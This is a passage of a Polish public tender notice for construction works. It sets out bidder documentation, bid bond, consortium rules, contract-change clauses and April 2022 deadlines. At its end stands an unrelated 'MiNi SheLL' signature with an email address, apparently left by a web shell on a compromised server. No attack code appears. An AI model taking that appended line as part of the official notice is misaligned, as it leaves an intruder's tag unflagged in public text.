odpowiednio <br/>oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego <br/>reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą złożone przed <br/>organem sadowym lub administracyjnym, notariuszem, organem samorządu <br/>zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania tej wykonawcy. Przepis dotyczący terminu wystawienia dokumentu stosuje się odpowiednio. (Dokumenty te powinny być wystawione nie wcześniej niż 3 miesiące przed złożeniem).<br/><br/> c. Każdy wykonawca występujący wspólnie oddzielnie składa dokumenty lub <br/> oświadczenia wymienione w pkt. a lub b.<br/><br/> d. Wykonawca , który polega na zdolnościach innych podmiotów na zasadach określonych <br/> w art. 118 ust.1 Ustawy zobowiązany jest złożyć w odniesieniu do tych podmiotów <br/> dokumenty wymienione w pkt. a lub b.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a. Wykaz robót wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest <br/>krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca <br/>wykonania i podmiotów, na rzecz których roboty te zostały wykonane z załączeniem<br/>dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami <br/>prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane były wykonywane a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne dokumenty .<br/><br/> b. Wykaz osób skierowanych przez wykonawcę do realizacji zamówienia<br/> publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę <br/> jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich <br/> kwalifikacji zawodowych, uprawnień doświadczenia i wykształcenia niezbędnych do <br/> wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie <br/> czynności oraz informacją o podstawie dysponowania tymi osobami .<br/> <br/> Dokumenty wymienione w pkt. 10.2. składa ten lub ci z Wykonawców, którzy w imieniu <br/>wszystkich Wykonawców będą spełniać warunki określone w SWZ (oceniany będzie ich łączny potencjał kadrowy i łączne doświadczenie zawodowe).</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 9.1 Do oferty (Formularz oferty stanowi załącznik nr 1 do SWZ) Wykonawca dołącza aktualne na<br/>dzień składania ofert:<br/>a. oświadczenie o spełnieniu warunków udziału w postępowaniu - opisanych w pkt. 8.2<br/>niniejszej specyfikacji) – zał. nr 2.<br/>b. oświadczenie dotyczące przesłanek wykluczenia z postępowania – opisanych w pkt.<br/>8.1 niniejszej specyfikacji ) - zał. nr 3.<br/>W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o zamówienie<br/>każdy z wykonawców oddzielnie składa w/w oświadczenia.<br/>9.2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają zgodnie z art.117<br/>ust. 4 Ustawy, oświadczenie (załącznik nr 5 SWZ), z którego wynika które roboty wykonają<br/>poszczególni Wykonawcy.<br/>9.3. Wykonawca, który w celu potwierdzenia spełniania warunków udziału w postępowaniu<br/>polega na zdolnościach innych podmiotów, musi udowodnić zamawiającemu, że realizując<br/>zamówienie będzie dysponował niezbędnymi zasobami tych podmiotów, przedstawiając w<br/>szczególności zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych<br/>zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy<br/>potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi<br/>zasobami tych podmiotów – propozycja zobowiązania - załącznik nr 4 do SWZ.<br/>9.4. Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku<br/>istnienia wobec nich podstaw wykluczenia oraz spełniania, w zakresie, w jakim powołuje się na<br/>ich zasoby, warunków udziału w postępowaniu zamieszcza informacje o tych podmiotach w<br/>oświadczeniach wymienionych w pkt. 9.1a i 9.1b. oraz przekazuje oświadczenie podmiotu<br/>udostępniającego zasoby, potwierdzające brak podstaw wykluczenia (9.1b) tego podmiotu oraz<br/>odpowiednio spełnianie warunków udziału w postępowaniu (9.1a), w zakresie, w jakim<br/>wykonawca powołuje się na jego zasoby.<br/>9.5 Potwierdzenie wniesienia wadium na zasadach opisanych w ust. 12 SWZ (jeżeli wadium jest<br/>wymagane przez Zamawiającego).<br/>9.6 Pełnomocnictwo do reprezentowania wszystkich wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia (w tym spółki cywilne).<br/>9.7. Pełnomocnictwo do występowania w imieniu wykonawcy w przypadku, gdy ofertę i inne<br/>dokumenty nie podpisuje osoba uprawniona do reprezentowania wykonawcy (lub wykonawca w przypadku osób fizycznych). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Przed upływem terminu składania ofert należy wnieść wadium w wysokości:<br/>15 000,00 zł słownie złotych: piętnaście tysięcy złotych 00/100. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W przypadku wspólnego<br/>ubiegania się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego (do oferty należy załączyć odpowiednie pełnomocnictwo). Wszelka korespondencja<br/>oraz rozliczenia dokonywane będą wyłącznie z podmiotem występującym jako pełnomocnik<br/>pozostałych.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (w tym<br/>konsorcja, spółki cywilne) żaden z Wykonawców nie może podlegać wykluczeniu (podstawy<br/>wykluczenia - pkt. 8.1 SWZ.).<br/>Natomiast spełnianie warunków opisanych w SWZ Wykonawcy wykazują wspólnie, łącznie.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają oświadczenie z którego<br/>wynika które roboty wykonają poszczególni wykonawcy (9.2 SWZ). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 21.2 Niedopuszczalne są zmiany istotnych postanowień umowy w stosunku do treści oferty, <br/> na podstawie której dokonano wyboru Wykonawcy, za wyjątkiem zmian przewidzianych<br/> w umowie na podstawie art. 455 ust.1 pkt.1 oraz jeżeli zajdzie co najmniej jedna <br/> z okoliczności przewidzianych w art. 455 ust 1 i ust. 2 Ustawy.<br/><br/>21.3. Na podstawie art.455 ust.1 pkt. 1 Ustawy Zamawiający przewiduje następujące <br/> możliwości zmiany Umowy:<br/> <br/>1)	Zamawiający dopuszcza możliwość przedłużenia terminu realizacji wykonania <br/>zamówienia w przypadku wystąpienia niezależnych od Wykonawcy okoliczności:<br/> a. w przypadku wystąpienia robót nie objętych przedmiotem zamówienia (robót <br/> dodatkowych), które są niezbędne do wykonania, a których realizacja powoduje <br/> konieczność przedłużenia terminu Umowy,<br/> b. w przypadku wystąpienia konieczności wykonania robót zamiennych,<br/> c. ujawnienia niezinwentaryzowanych lub o odmiennym przebiegu niezgodnym <br/> z inwentaryzacją podziemnych sieci, in¬stalacji lub urządzeń obcych i koniecz¬ności <br/> wykonania robót związanych z ich zabezpieczeniem lub usunięciem kolizji, <br/> d. w przypadku, gdy po rozpoczęciu robót okaże się, że sieci podziemne, instalacje, <br/> urządzenia obce są w złym stanie technicznym i zachodzi konieczność ich remontu <br/> przez podmioty odpowiedzialne za te sieci, urządzenia, co spowoduje przerwę<br/> w realizacji przedmiotu Umowy, <br/> e. w przypadku wystąpienia niekorzystnych warunków atmosferycznych, nie <br/> pozwalających na prowadzenie prac oraz uniemożliwiających zapewnienie <br/> odpowiedniej jakości wykonywanych robót, tj.: ciągłe opady atmosferyczne (trwające <br/> powyżej 5 dni) lub wstrzymanie robót po opadach w związku z namoknięciem <br/> terenu, zalaniem placu budowy i uszkodzeniami przez intensywne opady,<br/><br/> 2)	W przypadku zaistnienia w/w okoliczności pkt.1 Zamawiający może przedłużyć termin <br/> zakończenia wykonania zamówienia na pisemny, szczegółowo uzasadniony wniosek <br/> Wykonawcy zaopiniowany przez osobę nadzorująca ze strony Zamawiającego. Okres <br/> przedłużenia terminu nie może być dłuższy niż czas trwania tych okoliczności.<br/><br/> 3) Zmiana osoby na stanowisku kierownika budowy pod warunkiem, że wskazana osoba <br/> spełniać będzie wymagania określone w specyfikacji warunków zamówienia. <br/> <br/> 4) Zmiana wynagrodzenia w związku z rozliczeniem wykonanych robót kosztorysem <br/> powykonawczym, oraz w przypadku zmiany Umowy na podstawie art. 455 ust.1, <br/> pkt 1,2,3,4 oraz ust. 2.<br/><br/> 5) Zmiana wynagrodzenia będąca konsekwencją wykonania robót zamiennych, robót <br/> zaniechanych oraz robót dodatkowych.<br/><br/> 6) W przypadku, gdy oferta Wykonawcy nie zawierała wskazania części, którą na etapie realizacji zamówienia zamierza on powierzyć Podwykonawcy, Zamawiający dopuszcza zmianę postanowień zawartej Umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, tj. powierzenia części zamówienia do realizacji przez Podwykonawców.<br/><br/> 7) Zamawiający dopuszcza rezygnację z Podwykonawcy lub zmianę Podwykonawcy. <br/> W przypadku zmiany lub rezygnacji z Podwykonawcy, na którego zasoby <br/> Wykonawca powoływał się w celu wykazania spełniania warunków udziału <br/> w postępowaniu Wykonawca jest zobowiązany do wykazania Zamawiającemu, że <br/> proponowany inny Podwykonawca lub Wykonawca samodzielnie spełnia warunki <br/> udziału w postępowaniu w stopniu nie mniejszym niż Podwykonawca na którego zasoby <br/> Wykonawca powoływał się w trakcie postępowania o udzielenie zamówienia. <br/><br/> <br/><br/> <br/><br/> Zamawiający wskazuje pozostałe przypadki przewidzianych w umowie zmian w informacjach<br/>dodatkowych (SEKCJA IX – POZOSTAŁE INFORMACJE). Pełny opis zmian zawarty jest takżew ust. 21 SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-21 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferty (zaszyfrowane) należy przesłać droga elektroniczną za pośrednictwem https://miniportal.uzp.gov.pl/.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-21 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-05-20</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 8) Oznaczenia danych dotyczących Zamawiającego i/lub Wykonawcy.<br/> 9) Zmiana osoby odpowiedzialnej za realizację zamówienia ze strony Zamawiającego.<br/>10) Zmiany niezbędne do prawidłowej reali¬zacji zamówienia związane z:<br/><br/> - koniecznością zapewnienia bezpieczeń¬stwa lub zapobieżenia awarii;<br/><br/> - koniecznością spowodowaną zmianą obowiązujących przepisów prawa powodującą, że <br/> realizacja przedmiotu Umowy w niezmienionej postaci stanie się niecelowa; <br/><br/> - okoliczności powodujące, że przedmiot Umowy nie może zostać zrealizowany zgodnie z zasadami sztuki inżynierskiej; <br/><br/> - gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia Umowy <br/> okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze Stron nie ponosi <br/> odpowiedzialności, skutkująca brakiem możliwości należytego wykonania Umowy, <br/> zgodnie ze Specyfikacją Warunków Zamówienia - Zamawiający dopuszcza <br/> możliwość zmiany Umowy, w szczególności terminu realizacji zamówienia; <br/><br/> - w przypadku wystąpienia nieprze¬widywanych w dniu podpisywania Umowy kolizji z planowa¬nymi lub równolegle prowadzonymi przez inne pod¬mioty inwestycjami w zakresie nie¬zbędnym do uniknięcia lub usunięcia tych kolizji, w przypadku gdy wyko-nywanie robót nie będzie możliwe ze względu na obowiązek skoordynowa¬nia robót z Wykonawcą innych robót wykonywanych na terenie budowy (przedłużenie terminu realizacji bę¬dzie dopuszczalne jedynie o okres występowania kolizji uniemożliwia¬jący prowadzenie prac); <br/><br/>- gdy pomimo dochowania należytej sta¬ranności Wykonawcy pozyskiwanie stosownych uzgodnień gestorów sie¬ci, innych podmiotów lub osób, któ¬rych opinia lub zgoda będzie wyma¬gana przepisami prawa, przedłuży się w czasie ponad termin zwyczajowo przyjęty dla danej czynności (prze¬dłużenie terminu realizacji będzie do¬puszczalne jedynie o okres trwania czynności wykraczający poza zwyczajowo przyjęty), <br/><br/> 21.4.. Zmiana terminu wykonania Umowy w przypadku:<br/><br/> -	zmian obowiązujących przepisów prawa wpływających na termin i sposób wykonania <br/>przedmiotu Umowy, w tym w szczególności wynikających z ustawy z dnia 2 marca 2020 o szczególnych rozwiązaniach związanych z zapobieganiem, przeciwdziałaniem i zwalczaniem COVID-19, innych chorób zakaźnych oraz wywołanych nimi sytuacji kryzysowych (Dz. U. z 2021 r., poz. 2095 z późn. zm.);<br/> <br/> -	przedłużenia przez władze państwowe stanu epidemii lub dokonania zmiany tego stanu<br/> na inny stan wyjątkowy, ograniczający normalny sposób funkcjonowania państwa. <br/><br/>21.5. Wniosek o zmianę Umowy powinien zawierać zakres proponowanej zmiany, opis okoliczności faktycznych uprawniających do dokonania zmiany, informacje i dowody potwierdzające, że zostały spełnione okoliczności uzasadniające dokonanie zmiany Umowy. <br/><br/> 21.6.	Strona wnioskująca o zmianę terminu wykonania Umowy zobowiązana jest do wykazania, że ze względu na zaistniałe okoliczności – uprawniające do dokonania zmiany – dochowanie pierwotnego terminu jest niemożliwe.

Creat By MiNi SheLL
Email: jattceo@gmail.com